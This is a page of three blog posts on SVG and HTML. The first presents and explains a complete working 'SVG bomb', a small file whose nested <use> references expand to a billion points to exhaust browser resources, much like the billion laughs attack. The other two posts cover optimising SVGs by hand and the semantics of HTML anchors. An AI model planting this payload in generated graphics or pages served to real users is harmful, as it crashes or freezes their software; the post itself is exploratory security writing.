html · brhfl.com

A billion points: an SVG bomb

bri hefele, 2017-11-08, graphics, html, security, svg

SVGs, via the <use> tag, are capable of symbolic references. If I know I’m going to have ten identical trees in my image, I can simply create one tree with an id="tree" inside of an undrawn <defs> block, and then reference it ten times inside the image along the lines of <use xlink:href="#tree" x="50" y="50"/>.

A billion laughs is a bomb-style attack in which an XML document makes a symbolic reference to an element ten times, then references that symbol ten times in a new symbol, and again, and again, until a billion (10⁹) of these elements are being created. It creates a tremendous amount of resource consumption from a few kilobytes of code. Will symbolic references in an SVG behave similarly?

I briefly searched for SVG bombs, and as expected mostly came up with clipart. I did find one Python script for generating SVG bombs, but it relied on the same XML strategy as the classic billion laughs attack¹. The answer is that yes, in about 2.3kB we can make a billion points and one very grumpy web browser:

<svg version="1.2" baseProfile="tiny" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" xml:space="preserve">
<path id="a" d="M0,0"/>
<g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
<g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
<g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
<g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
<g id="f"><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/></g>
<g id="g"><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/></g>
<g id="h"><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/></g>
<g id="i"><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/></g>
<g id="j"><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/></g>
</svg>

It works precisely the same way as a billion laughs: it creates one point, a, at 0,0; then it creates a group, b with ten instances of a; then group c with ten instances of b; and so on until we have 10⁹ (+1, I suppose) instances of our point, a. I’m not entirely sure how a renderer handles ‘drawing’ a single point with no stroke, etc. (essentially a nonexistent object), but it is interesting to note that if we wrap the whole thing in a <defs> block (which would define the objects but not draw them), the bomb still works. Browsers respond a few different ways…

SVGs

bri hefele, 2017-10-20, code, data visualization, graphics, html, image processing, svg

For someone rooted in graphic design and illustration, I typically hate running across visuals on the internet. Aside from being numbed by ads, the fact of the matter is that a large percentage of the graphical presentation on the web is just bandwidth-stealing window dressing with little impact on the surrounding content. Part of my plan with this blog was to avoid graphics almost entirely, and yet over the past month or so, I have littered this space with a handful of SVGs. I think, for the most part, they have added meaningful visual aids to the surrounding content, but I still don’t want to make too much of a habit of it.

I’m far more comfortable with SVGs (or, vector graphics in general) because I find it easier to have them settle onto the page naturally without becoming jarring. I could obviously restrict the palette of a raster image to the palette of my site, and render a high resolution PNG with manageable file size, but scaling will still come into play, type may be mismatched… aside from being accessibility issues, these things have subtle effects on visual flow. I’m thankful that SVG has been adopted as well as it has, and that it’s relatively simple to write or manipulate by hand. Following is the process I go through to make my graphics as seamless as possible.

Generally speaking, the first step is going to be to get my graphic into Illustrator. Inside Illustrator, I have a palette corresponding to my site’s colors. Making CSS classes for primary, secondary, tertiary colors is in my to-do list, but I need to ensure nothing will break with a class defining both color and fill. Groups and layers (mostly) carry over when Illustrator renders out an SVG, so I make a point of going through the layer tree to organize content. Appearances applied to groups cascade down in the output process, so (as far as SVG output is concerned) there’s no point in, say, applying a fill to a group – each individual item will get that fill in the end anyway. I use Gentium for all of the type, as that is ideally how it will be rendered in the end, though it’s worth quickly checking how it all looks in Times New Roman as well.

Once I get things colored and grouped as I need them, I crop the artboard to the artwork boundaries. This directly affects the SVG viewbox, and unless I need extra whitespace for the sake of visually centering a graphic, I can rely instead on padding or the like for spacing.

Once in the SVG Save dialog, I ensure that ‘Type’ is set to ‘SVG’. I don’t want anything converted to an outline, because I want the type to visually fall back with the rest of my page. I never actually save an SVG file from Illustrator, I just go to ‘SVG Code…’ from the Save dialog, and copypaste it elsewhere for further massaging. This involves:

Setting width="100%" and height="15em"¹, or somewhere near that as far as height is concerned. This keeps the images centered and prevents unsightly scaling issues on mobile.
Removing all references to font-family, which ensures that my page’s font cascades down. Generally this means that it’ll render in Gentium as when I was designing it, but if the page falls back for whatever reason, the graphic will too.
Ensuring unique IDs are used. If I didn’t name layers, etc. in Illustrator, I could wind up with several objects on a page with id="Layer1", which would obviously violate HTML spec.
Getting rid of any empty groups. Sometimes Illustrator just throws in a bunch of <g></g> at the end for no discernible reason.
Grouping similar objects, as best as possible, applying shared attributes to the group instead of individual objects
Deleting empty <rect>s, which Illustrator creates around text boxes. Presumably this is because, in Illustrator, text boxes themselves can have appearances applied to them like any other object. It would be nice if it was smart enough to only carry this over if there was some sort of appearance, though.
Adding a <title> if a description is necessary, or aria-hidden="true" to the SVG if the image can be ignored by assistive technology.
Likewise, if the graphic is being ‘read’, adding aria-hidden="true" to (likely) all of the text elements within. In my diagrams, assistive tech users certainly don’t need to hear a bunch of random numbers without context, especially when I’ve provided a <title>.

Illustrator seemingly outputs SVG with the intent being structural accuracy if the file is read back in for editing, which is often counterproductive for web use, which would prioritize small filesize without a sacrifice in selection ordering or visual accuracy. To be fair, I just installed 2018 and haven’t tested its SVG waters yet, so we’ll see how Adobe managed to ~~mess that up~~ handle that.

Finally, it’s worth mentioning SVGO (and the web-based SVGOMG). Very customizable optimization, definitely more useful once one starts dealing with more intricate, complicated SVGs. I’m happy to optimize mine down by hand, and stop there – but I’m keeping them to a handful of kilobytes anyway.

Anchors, away!

bri hefele, 2017-07-10, communication, html

My line of work involves a lot of mushing around of the requirements of customers who don’t know the Agency’s style requirements, best practices for web, and CMS limitations into something that comfortably adheres to the preceding rules while still pleasing (or at least appeasing) said customer. Often, folks inexplicably want a handful of tiny, near-zero content pages, when typically we try to present the content together, broken up by headers with IDs. I have to go through quite a few layers to communicate how their requirements will actually manifest, and the technical knowledge is reduced each step of the way.

The term ‘anchors’ comes up in these instances, a lot. I understand that the term makes sense as far as relating something concrete to a structural abstraction – the ‘anchor’ is cast somewhere on the page, and you can just follow the corresponding line (link) to it. I also understand how this came to be from a historical tech perspective – as I understand it, Tim Berners-Lee envisioned a far more bidirectional system of linking, so our <a> (anchor) element would represent something more nodelike, an exit point and an entrance point.

But links don’t work that way on the internet as we know it. The <a> element is probably the least logically named element in modern HTML. But for a while, even though <a> elements still didn’t work that way, we had kind of a hack in place that accomplished the same goal. The HTML 3.2 specification tells us that “[Anchors] are used to define hypertext links and also to define named locations for use as targets for hypertext links”, with the distinction coming from whether an <a> element has an href or a name attribute. It wasn’t until HTML 4.0 that we even had an id attribute to use.

The two uses of the anchor element, while compatible in conjunction with one another (<a href="www.example.com" name="here">) in line with Berners-Lee’s vision, are still semantically very different functions. HTML 4.0 still encouraged the dual-usage, but at least acknowledged these were fundamentally different things, “The A element may define an anchor, a link, or both.” It no longer actually calls <a> anchor, and instead states that the element has two distinct usages. Obviously this is not great as far as semantics are concerned, but more trouble comes when one starts to introduce styling.

HTML 4.0 brought with it the big push for stylesheets, the separation of structure and content. Of course, if you’re styling <a> to look like a link, all of your <a> elements being used as anchors now just appear to be nonfunctional links. The solution wrecked any sense of structural connection between the anchor and the text it represents – simply use an empty <a name="headline"> element in front of your text. This is clearly awful, and with the id attribute now present and sharing namespace with name, entirely unnecessary.

HTML5 still supports this behavior, though recommends against it. Anyone who cares at all about semantics, about accessibility should recommend against it. The CMS I use at work has finally done away with it. And I think that as we slowly come to our senses about this, we should probably just do away with the term ‘anchor’ as well. The attribute is id, the hash in the URL denotes a ‘fragment identifier’. They’re a bit more jargonistic, but these are the terms I always try to use. There’s still a legacy connection between the word ‘anchor’ and the <a> element. And when dealing with folks who occasionally wind up changing things that they don’t really have the background to be changing, legacy language can lead to legacy behavior, as well as making it more difficult to search for help they may need.